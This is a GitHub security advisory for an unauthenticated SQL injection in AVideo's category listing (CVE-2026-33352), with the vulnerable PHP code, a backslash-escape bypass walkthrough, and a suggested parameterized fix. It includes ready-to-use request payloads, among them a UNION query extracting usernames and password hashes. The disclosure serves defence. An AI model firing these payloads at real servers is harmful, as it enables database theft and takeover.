Skip to content

AVideo has an Unauthenticated SQL Injection via `doNotShowCats` Parameter (Backslash Escape Bypass)

Critical severity GitHub Reviewed Published Mar 19, 2026 in WWBN/AVideo • Updated Mar 25, 2026

Package

composer wwbn/avideo (Composer)

Affected versions

<= 26.0

Patched versions

None

Description

Summary

An unauthenticated SQL injection vulnerability exists in objects/category.php in the getAllCategories() method. The doNotShowCats request parameter is sanitized only by stripping single-quote characters (str_replace("'", '', ...)), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in objects/security.php.

Affected Component

File: objects/category.php, lines 386-394, inside method getAllCategories()

if (!empty($_REQUEST['doNotShowCats'])) {
    $doNotShowCats = $_REQUEST['doNotShowCats'];
    if (!is_array($_REQUEST['doNotShowCats'])) {
        $doNotShowCats = array($_REQUEST['doNotShowCats']);
    }
    foreach ($doNotShowCats as $key => $value) {
        $doNotShowCats[$key] = str_replace("'", '', $value);  // INSUFFICIENT
    }
    $sql .= " AND (c.clean_name NOT IN ('" . implode("', '", $doNotShowCats) . "') )";
}

Root Cause

  1. Incomplete sanitization: The only defense is str_replace("'", '', $value), which strips single-quote characters. It does not strip backslashes (\).
  2. No global filter coverage: The doNotShowCats parameter is absent from every filter list in objects/security.php ($securityFilter, $securityFilterInt, $securityRemoveSingleQuotes, $securityRemoveNonChars, $securityRemoveNonCharsStrict, $filterURL, and the _id suffix pattern).
  3. Direct string concatenation into SQL: The filtered values are concatenated into the SQL query via implode() instead of using parameterized queries.

Exploitation

MySQL, by default, treats the backslash (\) as an escape character inside string literals (unless NO_BACKSLASH_ESCAPES SQL mode is enabled, which is uncommon). This allows a backslash in one array element to escape the closing single-quote that implode() adds, shifting the string boundary and turning the next array element into executable SQL.

Step-by-step:

  1. The attacker sends:

    GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=)%20OR%201=1)--%20-

  2. After str_replace("'", '', ...), values are unchanged (no single quotes to strip):

    • Element 0: \
    • Element 1: ) OR 1=1)-- -

  3. After implode("', '", ...), the concatenated string is:

    \', ') OR 1=1)-- -

  4. The full SQL becomes:

    AND (c.clean_name NOT IN ('\', ') OR 1=1)-- -') )

  5. MySQL parses this as:

    • '\' — the \ escapes the next ', making it a literal quote character inside the string. The string continues.
    • , ' — the comma and space are part of the string. The next ' (which was the opening quote of element 1) closes the string.
    • String value = ', (three characters: quote, comma, space)
    • ) OR 1=1) — executable SQL. The first ) closes NOT IN (, the second ) closes the outer AND (.
    • -- - — SQL comment, discards the remainder ') )

    Effective SQL:

    AND (c.clean_name NOT IN (', ') OR 1=1)

    This always evaluates to TRUE.

For data extraction (UNION-based):

GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20-

Produces:

AND (c.clean_name NOT IN ('\', ')) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- -') )

This appends a UNION query that extracts usernames and password hashes from the users table. The attacker must match the column count of the original SELECT (determinable through iterative probing).

Impact

  • Confidentiality: Full read access to the entire database, including user credentials, emails, private video metadata, API secrets, and plugin configuration.
  • Integrity: Ability to modify or delete any data in the database via stacked queries or subqueries (e.g., UPDATE users SET isAdmin=1).
  • Availability: Ability to drop tables or corrupt data.
  • Potential RCE: On MySQL configurations that allow SELECT ... INTO OUTFILE, the attacker could write a PHP web shell to the server's document root.

Suggested Fix

Replace the string concatenation with parameterized queries:

if (!empty($_REQUEST['doNotShowCats'])) {
    $doNotShowCats = $_REQUEST['doNotShowCats'];
    if (!is_array($doNotShowCats)) {
        $doNotShowCats = array($doNotShowCats);
    }
    $placeholders = array_fill(0, count($doNotShowCats), '?');
    $formats = str_repeat('s', count($doNotShowCats));
    $sql .= " AND (c.clean_name NOT IN (" . implode(',', $placeholders) . ") )";
    // Pass $formats and $doNotShowCats to sqlDAL::readSql() as bind parameters
}

Alternatively, use $global['mysqli']->real_escape_string() on each value as a minimum fix, though parameterized queries are strongly preferred.

References

@DanielnetoDotCom DanielnetoDotCom published to WWBN/AVideo Mar 19, 2026
Published to the GitHub Advisory Database Mar 19, 2026
Reviewed Mar 19, 2026
Published by the National Vulnerability Database Mar 23, 2026
Last updated Mar 25, 2026

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(11th percentile)

Weaknesses

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Learn more on MITRE.

CVE ID

CVE-2026-33352

GHSA ID

GHSA-mcj5-6qr4-95fj

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.